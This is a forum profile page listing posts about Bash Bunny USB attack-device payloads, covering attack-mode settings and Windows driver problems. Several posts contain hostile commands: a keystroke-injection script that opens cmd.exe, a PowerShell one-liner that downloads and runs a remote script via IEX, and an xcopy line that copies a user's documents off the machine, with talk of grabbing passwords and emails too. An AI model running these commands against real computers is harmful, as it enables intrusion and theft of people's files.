Jump to content

Seczilla

Active Members
  • Posts

    7
  • Joined

  • Last visited

Posts posted by Seczilla

  1. 13 hours ago, unixnerd777 said:

    I guess I didn't look hard enough, I asked about this after you did: 

     

    TLDR; use 

    
    ATTACKMODE RNDIS_ETHERNET RNDIS_SPEED_10000

     

    Yes thanks. I figured it out by now. I asked the question before the firmware got released that included the feature.

  2. 7 hours ago, Decoy said:

    Yes, I apologise if that wasn't clear. 

    Yes sorry, I know that it does not make sense. It was just to show that changing it will remove the Ethernet device again and I can not use the Ethernet connection in HID mode then (unless I have a loop that waits for the Ethernet connection to be available).

    I was not sure if this is an issue with just Windows 10 or if every version of Windows is affected. I think there are devices that work with RNDIS and HID at the same time in Windows 10, so it must be possible somehow. The question for me was just, how it can be done. I have a working code now but I thought this is not the best way to do it as it creates delays and officially the bunny should be able to do that. Maybe someone else had it figured out but it doesn't look like.

    Thanks all for your comments.

  3. Thanks @Decoy. The Wiki was the first read I had.

    I know I don't have to do them all at the same time but I don't like switching between HID and Ethernet for example. The reason is that it creates delays every time I switch.

    Take this example:

    LED R B
    #ATTACKMODE HID RNDIS_ETHERNET
    
    ATTACKMODE RNDIS_ETHERNET
    ATTACKMODE HID 
    LED G
    
    Q GUI
    Q DELAY 500
    Q STRING cmd.exe
    Q DELAY 100
    Q ENTER
    Q DELAY 500
    Q STRING ping -t 172.16.64.1
    Q ENTER

    At first it creates the Ethernet interface just fine. Then it switches to HID and the Ethernet goes away (as expected). ATTACKMODE HID RNDIS_ETHERNET does not work either. It will fail to create the Ethernet interface and after that starts typing. 

    At https://forums.hak5.org/index.php?/topic/40246-windows-10-support/ it looks like I am not the only one having this issue. @Darren Kitchen said: 

    Quote

     

    The default switch2 payload recognizes as storage but not Ethernet on Windows. Same thing with Mac. Go figure - it works on my development Linux box. The issue has to do with composite devices and Windows ability to recognize RNDIS as one.

    When combining attack modes the Bash Bunny registers as a composite device. Windows doesn't recognize RNDIS_ETHERNET as a composite device by default. Drivers could be installed, but that defeats the purpose in many instances. Alone ATTACKMODE RNDIS_ETHERNET works without drivers on Windows hosts. Thankfully the ATTACKMODE command can be run subsequently to change the state to other modes later on in payloads conditionally.

     

    So the only way I found it was working on Windows is using HID first to create a loop and wait for the Ethernet connection to come to life. Not a sexy solution - more like a workaround. Technically it should be possible to have the BB register as HID AND Ethernet at the same time.

  4. When using the following at the same time the BB is not recognized as an Ethernet adapter.

    ATTACKMODE RNDIS_ETHERNET HID

    I thought that this would be a feature of the BB to combine attack modes at the same time. I know I can do them after each other but that makes it just more complicated in some cases.

    I have seen in some examples that they use HID to create a loop in Powershell to check for the connection with Test-Connection and after that switch the attack mode to RNDIS_ETHERNET.

    That just creates the following problem for me.

    C:\WINDOWS\system32>powershell "while ($true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/test.ps1');exit}}"
    
    Test-Connection : Testing connection to computer '172.16.64.1' failed: Error due to lack of resources
    At line:1 char:20
    + while ($true) {If (Test-Connection 172.16.64.1 -count 1) { ...
    +                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : ResourceUnavailable: (172.16.64.1:String) [Test-Connection], PingException
        + FullyQualifiedErrorId : TestConnectionException,Microsoft.PowerShell.Commands.TestConnectionCommand
    
    Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
    At line:1 char:77
    + ... IEX (New-Object Net.WebClient).DownloadString('http://172 ...
    +                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : WebException

    Is there any update planned to fix the behavior in Windows that we can actually use the attack modes at the same time?

    While I don't like the workaround mentioned above it would work if I would not get the message "Unable to connect to the remote server". If I execute it manually a few seconds later it works just fine. Any ideas? Thank you in advance.

  5. This might seem strange but I would like the BashBunny to be a slower network card. Is that possible? At the moment it presents itself as a 2 gbit interface. The reason for this is, that I don't want active VPN connections to drop because there is a new and faster interface.

    I hope this makes sense. Thanks for your advice.

  6. 5 minutes ago, peterkozmd said:

    Can there be a version that snags also images, address books,emails, bookmarks, passwords,etc.  an AIO (all-in one) that takes anything remotely interesting =)

    You can adapt it really easy.

    xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul

    Just change the *.pdf in line 22 of the e.cmd file to whatever you want.

×
×
  • Create New...